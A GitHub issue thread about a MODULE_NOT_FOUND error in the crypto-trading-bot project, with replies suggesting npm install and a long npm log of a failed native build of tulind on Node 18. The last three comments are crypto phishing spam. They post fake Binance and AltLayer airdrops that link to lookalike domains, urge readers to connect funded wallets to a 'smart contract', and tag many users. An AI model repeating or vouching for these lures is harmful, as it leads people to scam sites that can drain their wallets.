### ISSUE TITLE
how to fix it???

### ISSUE THREAD

**Issue by mojito228** [Haehnchen/crypto-trading-bot#286]
> crypto-trading-bot@0.0.0 start
> node index.js trade

internal/modules/cjs/loader.js:818
  throw err;
  ^

Error: Cannot find module '../dict/exchange_candlestick'
Require stack:
- /home/r/1/crypto-trading-bot/node_modules/binance-api-node/index.js
- /home/r/1/crypto-trading-bot/src/exchange/binance.js
- /home/r/1/crypto-trading-bot/src/modules/services.js
- /home/r/1/crypto-trading-bot/src/command/trade.js
- /home/r/1/crypto-trading-bot/index.js
    at Function.Module._resolveFilename (internal/modules/cjs/loader.js:815:15)
    at Function.Module._load (internal/modules/cjs/loader.js:667:27)
    at Module.require (internal/modules/cjs/loader.js:887:19)
    at require (internal/modules/cjs/helpers.js:74:18)
    at Object.<anonymous> (/home/r/1/crypto-trading-bot/node_modules/binance-api-node/index.js:5:29)
    at Module._compile (internal/modules/cjs/loader.js:999:30)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:1027:10)
    at Module.load (internal/modules/cjs/loader.js:863:32)
    at Function.Module._load (internal/modules/cjs/loader.js:708:14)
    at Module.require (internal/modules/cjs/loader.js:887:19) {
  code: 'MODULE_NOT_FOUND',
  requireStack: [
    '/home/r/1/crypto-trading-bot/node_modules/binance-api-node/index.js',
    '/home/r/1/crypto-trading-bot/src/exchange/binance.js',
    '/home/r/1/crypto-trading-bot/src/modules/services.js',
    '/home/r/1/crypto-trading-bot/src/command/trade.js',
    '/home/r/1/crypto-trading-bot/index.js'
  ]
}

**Comment by Wladastic** [comment]
Are you using npm run or docker-compose?

**Comment by DominiqueGEORGES** [comment]
Same problem !

I do not know "npm", thus using docker-compose

**Comment by Wladastic** [comment]
Run npm install first

**Comment by DominiqueGEORGES** [comment]
Hi,

Thanks to take time to reply me :)

I am a Windows guy, moved to Mac a few months ago, and understand nothing to nom, node, …

Here the output.

➜  Python_BOTs git clone https://github.com/Haehnchen/crypto-trading-bot.git
Cloning into 'crypto-trading-bot'...
remote: Enumerating objects: 6057, done.
remote: Counting objects: 100% (217/217), done.
remote: Compressing objects: 100% (141/141), done.
remote: Total 6057 (delta 128), reused 123 (delta 76), pack-reused 5840
Receiving objects: 100% (6057/6057), 4.19 MiB | 4.95 MiB/s, done.
Resolving deltas: 100% (4158/4158), done.
➜  Python_BOTs ls -al
total 24
drwxr-xr-x   8 dominiquegeorges  staff   256  8 aoû 20:35 .
drwxr-xr-x   4 dominiquegeorges  staff   128  2 jan  2022 ..
-rw-r--r--   1 dominiquegeorges  staff  7162 14 déc  2021 .gitignore
drwxr-xr-x   3 dominiquegeorges  staff    96 21 déc  2021 .vs
drwxr-xr-x   3 dominiquegeorges  staff    96 21 déc  2021 Python_BOTs
-rw-r--r--   1 dominiquegeorges  staff   941 21 déc  2021 Python_BOTs.sln
drwxr-xr-x  31 dominiquegeorges  staff   992  8 aoû 20:35 crypto-trading-bot
drwxr-xr-x   3 dominiquegeorges  staff    96  8 aoû 18:48 freqtrade
➜  Python_BOTs cd crypto
cd: no such file or directory: crypto
➜  Python_BOTs cd crypto-trading-bot
➜  crypto-trading-bot git:(master) npm install
npm WARN EBADENGINE Unsupported engine {
npm WARN EBADENGINE   package: ***@***.***',
npm WARN EBADENGINE   required: { node: '^8.3.0 || ^10' },
npm WARN EBADENGINE   current: { node: 'v18.7.0', npm: '8.15.0' }
npm WARN EBADENGINE }
npm WARN deprecated @***@***.***: This is a stub types definition. form-data provides its own type definitions, so you do not need this installed.
npm WARN deprecated ***@***.***: No longer maintained
npm WARN deprecated ***@***.***: Please update to ini >=1.3.6 to avoid a prototype pollution issue
npm WARN deprecated ***@***.***: Please see https://github.com/lydell/urix#deprecated
npm WARN deprecated ***@***.***: this library is no longer supported
npm WARN deprecated ***@***.***: request-promise has been deprecated because it extends the now deprecated request package, see https://github.com/request/request/issues/3142
npm WARN deprecated ***@***.***: This project is unmaintained
npm WARN deprecated ***@***.***: "Please update to latest v2.3 or v2.2"
npm WARN deprecated ***@***.***: Fixed a prototype pollution security issue in 4.1.0, please upgrade to ^4.1.1 or ^5.0.1.
npm WARN deprecated ***@***.***: https://github.com/lydell/resolve-url#deprecated
npm WARN deprecated ***@***.***: Debug versions >=3.2.0 <3.2.7 || >=4 <4.3.1 have a low-severity ReDos regression when used in a Node.js environment. It is recommended you upgrade to 3.2.7 or 4.3.1. (https://github.com/visionmedia/debug/issues/797)
npm WARN deprecated ***@***.***: Debug versions >=3.2.0 <3.2.7 || >=4 <4.3.1 have a low-severity ReDos regression when used in a Node.js environment. It is recommended you upgrade to 3.2.7 or 4.3.1. (https://github.com/visionmedia/debug/issues/797)
npm WARN deprecated ***@***.***: Debug versions >=3.2.0 <3.2.7 || >=4 <4.3.1 have a low-severity ReDos regression when used in a Node.js environment. It is recommended you upgrade to 3.2.7 or 4.3.1. (https://github.com/visionmedia/debug/issues/797)
npm WARN deprecated ***@***.***: Debug versions >=3.2.0 <3.2.7 || >=4 <4.3.1 have a low-severity ReDos regression when used in a Node.js environment. It is recommended you upgrade to 3.2.7 or 4.3.1. (https://github.com/visionmedia/debug/issues/797)
npm WARN deprecated ***@***.***: Debug versions >=3.2.0 <3.2.7 || >=4 <4.3.1 have a low-severity ReDos regression when used in a Node.js environment. It is recommended you upgrade to 3.2.7 or 4.3.1. (https://github.com/visionmedia/debug/issues/797)
npm WARN deprecated ***@***.***: Debug versions >=3.2.0 <3.2.7 || >=4 <4.3.1 have a low-severity ReDos regression when used in a Node.js environment. It is recommended you upgrade to 3.2.7 or 4.3.1. (https://github.com/visionmedia/debug/issues/797)
npm WARN deprecated ***@***.***: Debug versions >=3.2.0 <3.2.7 || >=4 <4.3.1 have a low-severity ReDos regression when used in a Node.js environment. It is recommended you upgrade to 3.2.7 or 4.3.1. (https://github.com/visionmedia/debug/issues/797)
npm WARN deprecated ***@***.***: Debug versions >=3.2.0 <3.2.7 || >=4 <4.3.1 have a low-severity ReDos regression when used in a Node.js environment. It is recommended you upgrade to 3.2.7 or 4.3.1. (https://github.com/visionmedia/debug/issues/797)
npm WARN deprecated ***@***.***: Debug versions >=3.2.0 <3.2.7 || >=4 <4.3.1 have a low-severity ReDos regression when used in a Node.js environment. It is recommended you upgrade to 3.2.7 or 4.3.1. (https://github.com/visionmedia/debug/issues/797)
npm WARN deprecated ***@***.***: Debug versions >=3.2.0 <3.2.7 || >=4 <4.3.1 have a low-severity ReDos regression when used in a Node.js environment. It is recommended you upgrade to 3.2.7 or 4.3.1. (https://github.com/visionmedia/debug/issues/797)
npm WARN deprecated ***@***.***: This project is unmaintained
npm WARN deprecated ***@***.***: babel-eslint is now @babel/eslint-parser. This package will no longer receive updates.
npm WARN deprecated ***@***.***: Please upgrade to the upcoming v2, currently (until end of February) install using ***@***.***!
npm WARN deprecated ***@***.***: Please upgrade  to version 7 or higher.  Older versions may use Math.random() in certain circumstances, which is known to be problematic.  See https://v8.dev/blog/math-random for details.
npm WARN deprecated ***@***.***: request has been deprecated, see https://github.com/request/request/issues/3142
npm WARN deprecated ***@***.***: Custom ALPHABET bug fixed in v7.0.2
npm WARN deprecated ***@***.***: Please upgrade to @mapbox/node-pre-gyp: the non-scoped node-pre-gyp package is deprecated and only the @mapbox scoped package will recieve updates in the future
npm ERR! code 1
npm ERR! path /Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind
npm ERR! command failed
npm ERR! command sh /var/folders/y9/twpczdnj43xg3kg_8wzlxl280000gn/T/install-790e9575.sh
npm ERR! CXX(target) Release/obj.target/tulind/tulind.o
npm ERR! Failed to execute '/opt/homebrew/Cellar/node/18.7.0/bin/node /opt/homebrew/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js build --fallback-to-build --module=/Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind/lib/binding/Release/node-v108-darwin-arm64/tulind.node --module_name=tulind --module_path=/Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind/lib/binding/Release/node-v108-darwin-arm64 --napi_version=8 --node_abi_napi=napi --napi_build_version=0 --node_napi_label=node-v108' (1)
npm ERR! node-pre-gyp info it worked if it ends with ok
npm ERR! node-pre-gyp info using ***@***.***
npm ERR! node-pre-gyp info using ***@***.*** | darwin | arm64
npm ERR! node-pre-gyp WARN Using request for node-pre-gyp https download
npm ERR! node-pre-gyp info check checked for "/Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind/lib/binding/Release/node-v108-darwin-arm64/tulind.node" (not found)
npm ERR! node-pre-gyp http GET https://tulipnode.s3.amazonaws.com/tulind/v0.8.18/Release/tulind-v0.8.18-node-v108-darwin-arm64.tar.gz
npm ERR! node-pre-gyp http 404 https://tulipnode.s3.amazonaws.com/tulind/v0.8.18/Release/tulind-v0.8.18-node-v108-darwin-arm64.tar.gz
npm ERR! node-pre-gyp WARN Tried to download(404): https://tulipnode.s3.amazonaws.com/tulind/v0.8.18/Release/tulind-v0.8.18-node-v108-darwin-arm64.tar.gz
npm ERR! node-pre-gyp WARN Pre-built binaries not found for ***@***.*** and ***@***.*** (node-v108 ABI, unknown) (falling back to source compile with node-gyp)
npm ERR! node-pre-gyp http 404 status code downloading tarball https://tulipnode.s3.amazonaws.com/tulind/v0.8.18/Release/tulind-v0.8.18-node-v108-darwin-arm64.tar.gz
npm ERR! gyp info it worked if it ends with ok
npm ERR! gyp info using ***@***.***
npm ERR! gyp info using ***@***.*** | darwin | arm64
npm ERR! gyp info ok
npm ERR! gyp info it worked if it ends with ok
npm ERR! gyp info using ***@***.***
npm ERR! gyp info using ***@***.*** | darwin | arm64
npm ERR! gyp info find Python using Python version 3.9.13 found at ***@***.***/bin/python3.9"
npm ERR! gyp info spawn ***@***.***/bin/python3.9
npm ERR! gyp info spawn args [
npm ERR! gyp info spawn args   '/opt/homebrew/lib/node_modules/npm/node_modules/node-gyp/gyp/gyp_main.py',
npm ERR! gyp info spawn args   'binding.gyp',
npm ERR! gyp info spawn args   '-f',
npm ERR! gyp info spawn args   'make',
npm ERR! gyp info spawn args   '-I',
npm ERR! gyp info spawn args   '/Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind/build/config.gypi',
npm ERR! gyp info spawn args   '-I',
npm ERR! gyp info spawn args   '/opt/homebrew/lib/node_modules/npm/node_modules/node-gyp/addon.gypi',
npm ERR! gyp info spawn args   '-I',
npm ERR! gyp info spawn args   '/Users/dominiquegeorges/Library/Caches/node-gyp/18.7.0/include/node/common.gypi',
npm ERR! gyp info spawn args   '-Dlibrary=shared_library',
npm ERR! gyp info spawn args   '-Dvisibility=default',
npm ERR! gyp info spawn args   '-Dnode_root_dir=/Users/dominiquegeorges/Library/Caches/node-gyp/18.7.0',
npm ERR! gyp info spawn args   '-Dnode_gyp_dir=/opt/homebrew/lib/node_modules/npm/node_modules/node-gyp',
npm ERR! gyp info spawn args   '-Dnode_lib_file=/Users/dominiquegeorges/Library/Caches/node-gyp/18.7.0/<(target_arch)/node.lib',
npm ERR! gyp info spawn args   '-Dmodule_root_dir=/Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind',
npm ERR! gyp info spawn args   '-Dnode_engine=v8',
npm ERR! gyp info spawn args   '--depth=.',
npm ERR! gyp info spawn args   '--no-parallel',
npm ERR! gyp info spawn args   '--generator-output',
npm ERR! gyp info spawn args   'build',
npm ERR! gyp info spawn args   '-Goutput_dir=.'
npm ERR! gyp info spawn args ]
npm ERR! gyp info ok
npm ERR! gyp info it worked if it ends with ok
npm ERR! gyp info using ***@***.***
npm ERR! gyp info using ***@***.*** | darwin | arm64
npm ERR! gyp info spawn make
npm ERR! gyp info spawn args [ 'BUILDTYPE=Release', '-C', 'build' ]
npm ERR! In file included from ../tulind.cpp:25:
npm ERR! ../../nan/nan.h:2536:8: warning: 'SetAccessor' is deprecated: Do signature check in accessor [-Wdeprecated-declarations]
npm ERR!   tpl->SetAccessor(
npm ERR!        ^
npm ERR! /Users/dominiquegeorges/Library/Caches/node-gyp/18.7.0/include/node/v8-template.h:837:3: note: 'SetAccessor' has been explicitly marked deprecated here
npm ERR!   V8_DEPRECATED("Do signature check in accessor")
npm ERR!   ^
npm ERR! /Users/dominiquegeorges/Library/Caches/node-gyp/18.7.0/include/node/v8config.h:460:35: note: expanded from macro 'V8_DEPRECATED'
npm ERR! # define V8_DEPRECATED(message) [[deprecated(message)]]
npm ERR!                                   ^
npm ERR! In file included from ../tulind.cpp:25:
npm ERR! In file included from ../../nan/nan.h:2884:
npm ERR! ../../nan/nan_typedarray_contents.h:34:43: error: no member named 'GetContents' in 'v8::ArrayBuffer'
npm ERR!       data   = static_cast<char*>(buffer->GetContents().Data()) + byte_offset;
npm ERR!                                   ~~~~~~~~^
npm ERR! 1 warning and 1 error generated.
npm ERR! make: *** [Release/obj.target/tulind/tulind.o] Error 1
npm ERR! gyp ERR! build error
npm ERR! gyp ERR! stack Error: `make` failed with exit code: 2
npm ERR! gyp ERR! stack     at ChildProcess.onExit (/opt/homebrew/lib/node_modules/npm/node_modules/node-gyp/lib/build.js:194:23)
npm ERR! gyp ERR! stack     at ChildProcess.emit (node:events:513:28)
npm ERR! gyp ERR! stack     at ChildProcess._handle.onexit (node:internal/child_process:291:12)
npm ERR! gyp ERR! System Darwin 21.6.0
npm ERR! gyp ERR! command "/opt/homebrew/Cellar/node/18.7.0/bin/node" "/opt/homebrew/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js" "build" "--fallback-to-build" "--module=/Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind/lib/binding/Release/node-v108-darwin-arm64/tulind.node" "--module_name=tulind" "--module_path=/Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind/lib/binding/Release/node-v108-darwin-arm64" "--napi_version=8" "--node_abi_napi=napi" "--napi_build_version=0" "--node_napi_label=node-v108"
npm ERR! gyp ERR! cwd /Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind
npm ERR! gyp ERR! node -v v18.7.0
npm ERR! gyp ERR! node-gyp -v v9.0.0
npm ERR! gyp ERR! not ok
npm ERR! node-pre-gyp ERR! build error
npm ERR! node-pre-gyp ERR! stack Error: Failed to execute '/opt/homebrew/Cellar/node/18.7.0/bin/node /opt/homebrew/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js build --fallback-to-build --module=/Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind/lib/binding/Release/node-v108-darwin-arm64/tulind.node --module_name=tulind --module_path=/Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind/lib/binding/Release/node-v108-darwin-arm64 --napi_version=8 --node_abi_napi=napi --napi_build_version=0 --node_napi_label=node-v108' (1)
npm ERR! node-pre-gyp ERR! stack     at ChildProcess.<anonymous> (/Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/node-pre-gyp/lib/util/compile.js:83:29)
npm ERR! node-pre-gyp ERR! stack     at ChildProcess.emit (node:events:513:28)
npm ERR! node-pre-gyp ERR! stack     at maybeClose (node:internal/child_process:1091:16)
npm ERR! node-pre-gyp ERR! stack     at ChildProcess._handle.onexit (node:internal/child_process:302:5)
npm ERR! node-pre-gyp ERR! System Darwin 21.6.0
npm ERR! node-pre-gyp ERR! command "/opt/homebrew/Cellar/node/18.7.0/bin/node" "/Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/.bin/node-pre-gyp" "install" "--fallback-to-build"
npm ERR! node-pre-gyp ERR! cwd /Users/dominiquegeorges/Projects/Python_BOTs/crypto-trading-bot/node_modules/tulind
npm ERR! node-pre-gyp ERR! node -v v18.7.0
npm ERR! node-pre-gyp ERR! node-pre-gyp -v v0.13.0
npm ERR! node-pre-gyp ERR! not ok

npm ERR! A complete log of this run can be found in:
npm ERR!     /Users/dominiquegeorges/.npm/_logs/2022-08-08T18_36_15_354Z-debug-0.log



Ensemble, appliquons les gestes barrières, et nous vaincrons ce virus.

Belle et agréable journée.
Prenez soin de vous.

Cordialement.

Dominique GEORGES



Le 8 août 2022 à 19:56, Wladastic ***@***.******@***.***>> a écrit :



Run npm install first

**Comment by mkproject-admin** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @Sadmansamee, @Krshivam25, @elbeg, @ddcreation, @alferov, @vbelephants, @crfilho

**Comment by mkproject-admin** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @

**Comment by code-bucks** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://go.altlayercommunity.online/XY2wna)

🚀 **Exciting Announcement!** AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of the total supply)
- **Distribution Categories:**
  - Ethereum Mainnet
  - Binance Mainnet

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://go.altlayercommunity.online/XY2wna).

The window to [Claim $ALT tokens](https://go.altlayercommunity.online/XY2wna) is open from January 25 to February 03, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

sergeysolovev, @visiongeist, @mayank, @emilienbidet, @lwhuang, @pablob206, @D50000, @psurma, @julio899, @flute, @augustmuir, @hkderekchan, @shravan-shandilya, @Jimmy-Xu, @u911083, @swcho, @bilast, @dseravalli, @CryptoQuaternions, @mzgs2
